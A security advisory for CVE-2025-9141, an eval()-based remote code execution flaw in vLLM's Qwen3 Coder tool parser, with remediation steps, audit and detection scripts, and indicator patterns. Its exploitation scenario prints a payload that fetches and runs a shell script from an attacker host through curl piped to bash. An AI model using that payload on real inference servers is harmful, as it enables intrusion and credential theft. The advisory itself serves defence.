If you run vLLM >=0.10.0 with Qwen3 Coder and tool calling enabled, any authenticated API user can execute arbitrary code on your inference server — patch to 0.10.1.1 immediately. As an immediate workaround, remove --enable-auto-tool-choice and --tool-call-parser qwen3_coder from your startup config. Inference servers typically run with broad internal access and hold sensitive credentials, making post-exploitation blast radius severe.
Risk Assessment
High severity (CVSS 8.8). Exploitability is high: network-accessible, low complexity, requires only standard API authentication with no elevated privileges or user interaction needed. LLM inference servers commonly hold API keys, model weights, and internal network access. vLLM is a widely-deployed inference backbone across enterprise and cloud AI stacks, broadening exposure significantly.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| vllm | pip | >= 0.10.0, < 0.10.1.1 | 0.10.1.1 |
If you run any vLLM version in the vulnerable range above, you are affected.
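To confirm which nodes fall in the vulnerable range, a minimal audit sketch is shown below. Assumptions: it runs in the same Python environment that serves vLLM, and the naive version parse only handles plain release strings such as 0.10.1.1.

```python
# Minimal version audit sketch. Assumes it runs in the Python environment
# that serves vLLM; the naive parse only handles plain release versions.
import importlib.metadata
import re

PATCHED = (0, 10, 1, 1)   # first fixed release per the table above
FIRST_BAD = (0, 10, 0)    # start of the vulnerable range

def parse_version(version: str) -> tuple:
    return tuple(int(part) for part in re.findall(r"\d+", version))

try:
    installed = importlib.metadata.version("vllm")
except importlib.metadata.PackageNotFoundError:
    print("vllm is not installed in this environment")
else:
    v = parse_version(installed)
    if FIRST_BAD <= v < PATCHED:
        print(f"vllm {installed}: VULNERABLE - upgrade to 0.10.1.1 or later")
    else:
        print(f"vllm {installed}: outside the vulnerable range")
```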
Recommended Action
Five steps:

1. PATCH: Upgrade vllm to >=0.10.1.1 immediately on all inference nodes.
2. WORKAROUND (if patching is delayed): Remove the `--enable-auto-tool-choice` and `--tool-call-parser qwen3_coder` flags from all startup configs and restart services.
3. NETWORK: Restrict vLLM API access to trusted internal clients only; never expose inference endpoints to the public internet without strong authentication and IP allowlisting.
4. DETECT: Audit API request logs for tool call parameters containing Python syntax patterns (parentheses, 'import', 'os.', 'subprocess.', '__') as exploitation indicators; see the log-scanning sketch after this list.
5. VERIFY: Audit all running vLLM versions with `pip show vllm` across inference nodes.
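For the DETECT step, the following is a rough log-scanning sketch. The indicator patterns mirror the list above, the log path and format are illustrative, and hits should be treated as triage leads rather than confirmed exploitation.

```python
# Rough detection sketch for the DETECT step. The log path/format is
# illustrative; the patterns mirror the indicators listed above and will
# produce false positives, so treat hits as triage leads.
import re
import sys

SUSPICIOUS = re.compile(r"__import__|__\w+__|\bimport\b|os\.\w+|subprocess\.\w+|eval\(")

def scan(path: str) -> None:
    with open(path, errors="replace") as handle:
        for lineno, line in enumerate(handle, start=1):
            if SUSPICIOUS.search(line):
                print(f"{path}:{lineno}: {line.strip()[:200]}")

if __name__ == "__main__":
    for log_path in sys.argv[1:]:
        scan(log_path)
```

Point it at whatever request or gateway logs capture tool-call bodies in your deployment, for example `python scan_tool_calls.py /var/log/vllm/requests.log` (both names are hypothetical).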
Frequently Asked Questions
What is CVE-2025-9141?
If you run vLLM >=0.10.0 with Qwen3 Coder and tool calling enabled, any authenticated API user can execute arbitrary code on your inference server — patch to 0.10.1.1 immediately. As an immediate workaround, remove --enable-auto-tool-choice and --tool-call-parser qwen3_coder from your startup config. Inference servers typically run with broad internal access and hold sensitive credentials, making post-exploitation blast radius severe.
Is CVE-2025-9141 actively exploited?
No confirmed active exploitation of CVE-2025-9141 has been reported, but organizations should still patch proactively.
How to fix CVE-2025-9141?
1. PATCH: Upgrade vllm to >=0.10.1.1 immediately on all inference nodes. 2. WORKAROUND (if patching is delayed): Remove --enable-auto-tool-choice and --tool-call-parser qwen3_coder flags from all startup configs and restart services. 3. NETWORK: Restrict vLLM API access to trusted internal clients only; never expose inference endpoints to the public internet without strong authentication and IP allowlisting. 4. DETECT: Audit API request logs for tool call parameters containing Python syntax patterns (parentheses, 'import', 'os.', 'subprocess.', '__') as exploitation indicators. 5. VERIFY: Audit all running vLLM versions with 'pip show vllm' across inference nodes.
What systems are affected by CVE-2025-9141?
This vulnerability affects the following AI/ML architecture patterns: LLM inference serving, agent frameworks, tool-enabled LLM pipelines, agentic AI platforms, multi-tenant AI API services.
What is the CVSS score for CVE-2025-9141?
CVE-2025-9141 has a CVSS v3.1 base score of 8.8 (HIGH).
Technical Details
NVD Description
### Summary
An unsafe deserialization vulnerability allows any authenticated user to execute arbitrary code on the server if they are able to get the model to pass the code as an argument to a tool call.

### Details
vLLM's [Qwen3 Coder tool parser](https://github.com/vllm-project/vllm/blob/main/vllm/entrypoints/openai/tool_parsers/qwen3coder_tool_parser.py) contains a code execution path that uses Python's `eval()` function to parse tool call parameters. This occurs during the parameter conversion process when the parser attempts to handle unknown data types. This code path is reached when:

1. Tool calling is enabled (`--enable-auto-tool-choice`)
2. The qwen3_coder parser is specified (`--tool-call-parser qwen3_coder`)
3. The parameter type is not explicitly defined or recognized

### Impact
Remote Code Execution via Python's `eval()` function.
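As a simplified illustration of the bug class (this is not vLLM's actual parser code), compare an `eval()`-based fallback with `ast.literal_eval`, which only accepts literals and is a common mitigation for this pattern:

```python
# Simplified illustration of the bug class - not vLLM's actual parser code.
import ast

def unsafe_convert(raw: str):
    # Vulnerable pattern: eval() executes any expression the caller manages
    # to get into the tool-call parameter, e.g. "__import__('os').getpid()".
    return eval(raw)

def safer_convert(raw: str):
    # ast.literal_eval only accepts Python literals (numbers, strings,
    # lists, dicts, ...) and raises on anything executable.
    try:
        return ast.literal_eval(raw)
    except (ValueError, SyntaxError):
        return raw  # keep the parameter as a plain string

print(safer_convert("[1, 2, 3]"))                  # parsed as a list
print(safer_convert("__import__('os').getpid()"))  # returned as a string, not executed
```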
Exploitation Scenario
An adversary with valid but low-privileged API credentials (stolen service account, malicious insider, or compromised client in a multi-tenant deployment) sends a crafted tool call request to a vLLM endpoint running Qwen3 Coder. The tool call includes a parameter with an unrecognized or ambiguous type, triggering the parser's `eval()` fallback path. The adversary injects a payload such as `__import__('os').system('curl attacker.com/shell.sh | bash')` as the parameter value. This executes on the inference server under the process owner's privileges, enabling credential theft, internal network pivoting, model weight exfiltration, or persistent backdoor installation.
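Because this scenario only applies to servers launched with both flags, a quick per-node exposure check can look for that flag combination on running processes. Below is a minimal Linux-only sketch, assuming the flags are passed on the command line rather than via a config file.

```python
# Minimal Linux-only exposure check: flag processes started with both risky
# flags named in this advisory. Assumes the flags appear on the command line.
import glob

def exposed_processes():
    for path in glob.glob("/proc/[0-9]*/cmdline"):
        try:
            with open(path, "rb") as handle:
                cmdline = handle.read()
        except OSError:
            continue  # process exited or access denied
        if (b"--enable-auto-tool-choice" in cmdline
                and b"--tool-call-parser" in cmdline
                and b"qwen3_coder" in cmdline):
            pid = path.split("/")[2]
            pretty = cmdline.replace(b"\x00", b" ").decode(errors="replace")
            yield pid, pretty

for pid, cmdline in exposed_processes():
    print(f"PID {pid} runs with the vulnerable flag combination: {cmdline}")
```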
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
References
Timeline
Related Vulnerabilities
All of the following related CVEs affect the same package (vllm):

| CVE | CVSS | Description |
|---|---|---|
| CVE-2024-9053 | 9.8 | vllm: RCE via unsafe pickle deserialization in RPC server |
| CVE-2026-25960 | 9.8 | vllm: SSRF allows internal network access |
| CVE-2025-47277 | 9.8 | vLLM: RCE via exposed TCPStore in distributed inference |
| CVE-2024-11041 | 9.8 | vllm: RCE via unsafe pickle deserialization in MessageQueue |
| CVE-2025-32444 | 9.8 | vLLM: RCE via pickle deserialization on ZeroMQ |